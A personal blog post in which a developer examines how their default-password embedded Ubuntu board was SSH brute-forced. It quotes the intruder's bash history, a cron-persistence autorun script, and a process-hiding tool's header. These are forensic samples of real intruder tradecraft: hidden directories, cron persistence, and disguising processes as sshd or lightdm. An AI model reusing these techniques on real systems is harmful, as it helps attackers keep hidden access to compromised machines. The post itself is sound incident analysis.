Sep 7 2013 • Ender Dai


Recently my Kayla development board cannot get correct DHCP address for some reason. I sent an email to sysadmin. They replied that an alert was triggered on their IDS and my board was believed has been compromised, so they blocked it:

> triggered alerts when it grabbed files from
>  We have identified this type of activity as being
> similar to activity that occurred with a server, during that the same
> timeframe, that was confirmed as being successfully SSH brute
> forced.
> Based on the available data likely has an account, with
> a weak password, that was successfully brute forced.
> Please block this system on the CIS network until the system
> administrator can investigate the issue.  If you are unable to block
> the system please update this ticket and I'll block the IP address on
> the campus network. IDS alert data is available below.  Timestamps
> are local TZ.

SH*T! Kayla comes with an factory default Ubuntu. There is a default user ubuntu with password ubuntu, which is indeed WEAK. I am aware of that but didn’t take it seriously: Kayla is just an embedded system which contains no critical data, and I thought I won’t be so unlucky to be the prey.

It turns out I was wrong.

Do tell your son the world is dangerous.

I am curious what has been done on Kayla. Looks like the hacker didn’t bother to erase his footprint in ~/.bash_history:

1399 w
1400 uptime
1401 cd /var/tmp
1402 ls -a
1403 mkdir ". "
1404 cd ". "
1405 wget
1406 tar zxvf hu.tgz
1407 rm -rf hu.tgz
1408 cd .m
1409 ls
1410 nano zmeu.ini
1411 vi zmeu.ini
1412 ./autorun
1413 ./run
1414 uname -a
1415 cd ..
1416 rm -rf .m
1417 wget
1418 tar zxvf miau.tgz
1419 rm -rfm i
1420 cd .us
1421 rm -rf miau.tgz
1422 cd .usr/
1423 ls
1424 vi miaurc
1425 ./h -s /usr/sbin/sshd ./init -d /var/tmp/". "/.usr
1426 cd ..
1427 ls -a
1428 rm -rf .usr/
1429 wget
1430 tar zxvf psybnc-linuxRO.tgz
1431 rm -rf psybnc-linuxRO.tgz
1432 mv psybnc/ .p
1433 cd .p
1434 ls
1435 chmod 777 *
1436 chmod +X *
1437 ls
1438 ps x
1439 ps -aux
1440 mv ntpd lightdm
1441 ./lightdm
1442 uname -a

Hmmm… A directory named . (dot space)? Interesting.

zmeu.ini? Google tells me ZmEu is an exploit scanner. I downloaded the hu.tgz, unpacked and had a quick check:

$ file autorun
autorun: POSIX shell script, ASCII text executable
$ cat autorun
pwd > zmeu.dir
dir=$(cat zmeu.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > zmeu.cron
crontab zmeu.cron
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/; then
pid=\$(cat $dir/
if \$(kill -CHLD \$pid >/dev/null 2>&1)
exit 0
cd $dir
./run &>/dev/null" > update
chmod u+x update

OK, he installed a cron job.

ubuntu@kayla:~$ crontab -l
* * * * * /var/tmp/. /.m/update >/dev/null 2>&1

Now what’s in ./run?

$ file run
run: POSIX shell script, ASCII text executable
$ cat run
export PATH=.
$ file -- -sh
-sh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.1, not stripped

So he invoked a (most likely customized) shell, and what has been done under this shell is unknown to me.

miau.tgz? Google says miau is an “IRC-bouncer/proxy”. So the hacker want some IRC bot? 1419~1422 looks like some typo to me. Don’t panic, dude.

I am wandering what is ./h. Luckily there is a h.c which I guess is the source code for ./h in the tarball.

$ file h
h: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.1, not stripped
$ head h.c

psf -- Process Stack Faker (a.k.a. Fucker)
Coded by Stas; (C)opyLeft by SysD Destructive Labs, 1997-2003

Tested on: FreeBSD 4.3, Linux 2.4, NetBSD 1.5, Solaris 2.7

Compile with:
# gcc -O2 -o h h.c
# strip h

Good, typical hacker tool.

Next tarball is psybnc-linuxRO.tgz which turns out to be yet another IRC bouncer. Why did he need two IRC bouncer? I doubt I can figure out the reason.


ubuntu@kayla:~$ uname -a
Linux kayla 3.1.10-carma #1 SMP PREEMPT Wed Jul 10 12:53:50 CEST 2013 armv7l armv7l armv7l GNU/Linux

All the binaries the hacker downloaded in the tarball are for Intel x86!

I believe this is what the hacker was thinking about when he saw the output of uname -a (line 1442):


This makes me feel much better :D